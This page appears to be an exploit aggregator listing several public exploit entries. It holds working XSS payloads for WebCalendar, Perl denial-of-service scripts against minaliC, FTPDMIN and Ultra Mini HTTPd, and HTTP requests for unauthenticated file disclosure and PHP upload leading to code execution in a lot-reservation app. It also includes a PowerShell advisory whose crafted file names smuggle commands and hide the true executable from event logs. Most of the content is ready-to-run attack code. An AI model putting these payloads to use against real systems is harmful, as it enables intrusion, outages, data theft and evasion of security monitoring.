Latest exploits :: CodePwn

<pre><code># Exploit Title: WebCalendar Version: 1.3.0 - Stored XSS - Reflected XSS # Date: 2024-3-1 # Exploit Author: tmrswrr # Vendor Homepage: http://www.k5n.us/webcalendar.php # Version: 1.3.0 # Tested on: https://www.softaculous.com/apps/calendars/WebCalendar ## Stored XSS 1 ) Write Events > Add New Events > Brief Description : https://demos2.softaculous.com/WebCalendarvqsmnseug2/edit_entry.php?year=2024&month=01&day=03 this payload : <sVg/onLy=1 onLoaD=confirm(1)// 2 ) You will bee alert button : https://demos2.softaculous.com/WebCalendarvqsmnseug2/month.php ============================================================================================= ## Reflected XSS 1 ) Go to this url and write payload : https://demos2.softaculous.com/WebCalendarvqsmnseug2/colors.php?color="><sVg/onLy=1 onLoaD=confirm(1)// Payload : "><sVg/onLy=1 onLoaD=confirm(1)// 2 ) You will be see alert button ============================================================================================== ## Reflected XSS 1 ) Go to this url and write payload users parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=admin&form=editentryform&year=2024&month=1&day=3 Payload : "><sVg/onLy=1 onLoaD=confirm(1)// 2 ) You will be see alert button : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&form=editentryform&year=2024&month=1&day=3 ============================================================================================== ## Reflected XSS 1 ) Go to this url and write payload fday parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year%27&date=20240201 Payload : "><sVg/onLy=1 onLoaD=confirm(1)// 2 ) You will be see alert button : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&fmonth=rpt_month&fyear=rpt_year%27&date=20240201 =============================================================================================== </code></pre>

<pre><code>#!/usr/bin/perl use Socket; # Exploit Title: minaliC 2.0.0 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 03 january 2024 # Vendor Homepage: http://minalic.sourceforge.net/ # Download to demo: https://drive.google.com/file/d/1WoDbps6up2s5Xa40YXDSABRU9J17yRQd/view?usp=sharing # Notification vendor: No reported # Tested Version: minaliC 2.0.0 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server did not properly handle request with large amounts of data via method GET to web server. #The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $junk = "\x41" x 245; my $host = "\x41" x 135; my $i=0; while ($i <= 3) { my $buf = "GET /" . $junk . " HTTP/1.1\r\n" . "Host: " . $host . "\r\n\r\n"; my $sock; socket($sock, AF_INET, SOCK_STREAM, 0) or die "[-] Could not create socket: $!\n"; my $addr = sockaddr_in($port, inet_aton($ip)); connect($sock, $addr); send($sock, $buf, length($buf), 0); $i++; } print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print "***************************************************\n"; print "* minaliC 2.0.0 - Denied of Service *\n"; print "* *\n"; print "* Coded by Fernando Mengali *\n"; print "* *\n"; print "* e-mail: fernando.mengalli\@gmail.com *\n"; print "* *\n"; print "***************************************************\n"; } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } #3. Solution/ How to fix: # This version product is deprecated </code></pre>

<pre><code>#!/usr/bin/perl use Net::FTP; # Exploit Title: FTPDMIN 0.96 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 2024-01-01 # Vendor Homepage: https://www.sentex.ca/~mwandel/ftpdmin/ # Download to demo: https://drive.google.com/file/d/1CpfvaJbJVxR3HPWvcxIVipTaTj7RAaLd/view?usp=sharing # Notification vendor: Yes reported # Tested Version: FTPDMIN 0.96 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://www.youtube.com/watch?v=q-CVJfYdd-g #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server did not properly handle request with large amounts of data via FTP command RNFR. #The following request sends a large amount of data to the FTP server to process across command RNFR, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $buf = "\x41"x269; my $point = "\x45\x2a\x42\x7b"; my $buf2 = "\x41"x126; my $payload = "RNFR ".$buf . $point . $buf2; my $ftp = Net::FTP->new($ip, Debug => 0) or die "Can't connect to server: $@"; $ftp->login("anonymous",'anonymous'); $ftp->quot($payload); $ftp->quit; print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print "***************************************************\n"; print "* FTPDMIN 0.96 - Denied of Service *\n"; print "* *\n"; print "* Coded by Fernando Mengali *\n"; print "* *\n"; print "* e-mail: fernando.mengalli\@gmail.com *\n"; print "* *\n"; print "***************************************************\n"; } sub main { our ($ip) = @ARGV; unless (defined($ip)) { print " \nUsage: $0 <ip> \n"; exit(-1); } } #3. Solution/ How to fix: # This version product is deprecated </code></pre>

<pre><code># Exploit Title: Ultra Mini HTTPd 1.21 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 2024-01-01 # Vendor Homepage: https://acme.com/ # Software Link: https://acme.com/ # Notification vendor: Yes reported # Tested Version: Ultra Mini HTTPd 1.21 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://www.youtube.com/watch?v=HWOGeg3e5As #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server did not properly handle request with large amounts of data via GET. #The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $buffer = "\x41"x192; my $payload = 'A' x 5438 . $buffer; my $i=0; while (i < 1) { my $socket = IO::Socket::INET->new( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', ) or die "Can't connect!!!!! \n\n"; my $payload = "GET / $payload HTTP/1.1\r\nHost:$ip\r\n\r\n"; $socket->send($payload); close($socket); $i++; } print "[+] Exploited success!!!!!\n\n"; sub intro { print "***************************************************\n"; print "* Ultra Mini HTTPd 1.21 - Denied of Service *\n"; print "* *\n"; print "* Coded by Fernando Mengali *\n"; print "* *\n"; print "* e-mail: fernando.mengalli\@gmail.com *\n"; print "* *\n"; print "***************************************************\n"; } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } #3. Solution/ How to fix: # This version product is deprecated. </code></pre>

<pre><code># Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability # Google Dork: N/A # Date: 10th December 2023 # Exploit Author: Elijah Mandila Syoyi # Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip # Version: 1.0 # Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0 # CVE : N/A Developer description about application purpose:- ------------------------------------------------------------------------------------------------------------------------------------------------------------------ About The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots. ------------------------------------------------------------------------------------------------------------------------------------------------------------------ Vulnerability:- The application is vulnerable to PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. PHP conversion to base64 filter will be used in this scenario. Proof of Concept:- (HTTP POST Request) GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1 Host: 192.168.150.228 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.150.228/lot/ Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9sn Upgrade-Insecure-Requests: 1 The same can be achieved by removing the PHPSESSID cookie as below:- GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1 Host: 192.168.150.228 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.150.228/lot/ Upgrade-Insecure-Requests: 1 The file requested will be returned in base64 format in returned HTTP response. The attack can also be used to traverse directories to return files outside the web root. GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1 Host: 192.168.150.228 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.150.228/lot/ Upgrade-Insecure-Requests: 1 This will return test.php file in the D:\ directory. </code></pre>

<pre><code># Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution # Google Dork: N/A # Date: 10th December 2023 # Exploit Author: Elijah Mandila Syoyi # Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip # Version: 1.0 # Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0 # CVE : N/A Developer description about application purpose:- ------------------------------------------------------------------------------------------------------------------------------------------------------------------ About The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots. ------------------------------------------------------------------------------------------------------------------------------------------------------------------ Vulnerability:- The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server. Proof of Concept:- (HTTP POST Request) POST /lot/admin/ajax.php?action=save_division HTTP/1.1 Host: 192.168.150.228 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027 Content-Length: 606 Origin: http://192.168.150.228 Connection: close Referer: http://192.168.150.228/lot/admin/index.php?page=divisions -----------------------------217984066236596965684247013027 Content-Disposition: form-data; name="id" -----------------------------217984066236596965684247013027 Content-Disposition: form-data; name="name" sample -----------------------------217984066236596965684247013027 Content-Disposition: form-data; name="description" sample -----------------------------217984066236596965684247013027 Content-Disposition: form-data; name="img"; filename="phpinfo.php" Content-Type: application/x-php <?php phpinfo() ?> -----------------------------217984066236596965684247013027-- Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address. </code></pre>

<pre><code>[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Windows PowerShell Built on the . NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows. [Vulnerability Type] PowerShell Single Quote Code Execution / Event Log Bypass [CVE Reference] N/A [Security Issue] In past times I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames. This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and PS event logging failure. On Windows CL tab completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution. However, if the filename gets wrapped in single quotes it failed, that is until now. [Single Quote Code Exec Bypass] Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename. The trailing semicolon ";" delimits the .XML extension and helps trigger the PE file specified in the case DOOM.exe and the PS event log gets truncated. Take the following three test cases using Defender API which takes a specially crafted filename. C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml" 1) Double quotes OK "Test;saps DOOM;.xml" 2) Single quotes FAILS 'Test;saps DOOM;.xml' 3) Single quotes BYPASS 'Test&DOOM;.xml' PowerShell API calls that prefix the "powershell" cmd is a requirement and may affect many built-in PS API or module commands. C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip' Malware.exe lives in Downloads dir, notice how we only need a partial name as part of the .ZIP archive filename we are scanning here and that it also excludes the .EXE portion in that filename. [PS Event Log Bypass] On Windows PowerShell event logging can be enabled to alert a SOC on suspicious activity and or for incident response forensic artifact purposes. However, when bypassing PS single quotes I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log. Example, processing 'Infected&Malware;.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed. Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory) C:\>powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5 Below the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed due to truncating. [PS Log ID 403 Snippet] Engine state is changed from Available to Stopped. Details: NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=25 HostName=ConsoleHost HostVersion=5.1.19041.1682 HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0 HostApplication=powershell get-filehash 'Infected EngineVersion=5.1.19041.1682 [Exploit/POC] powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5 Run some malware plus bypass logging of true file name: C:\Users\gg\Downloads>powershell get-filehash 'Infected&Malware;.zip' -algorithm md5 PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename. Defender Anti-Malware API: powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip' Call ping cmd using double "&": C:\>powershell Get-Filehash 'powerfail&ping 8.8.8.8&.txt' -algorithm md5 Call a Windows cmd to Logoff the victim: C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip' We have options: A) to call commands use double "&" --> 'virus&logoff&test.zip' B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip' [References] https://github.com/hyp3rlinx/PSTrojanFile https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: circa 2019 December 27, 2023 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx </code></pre>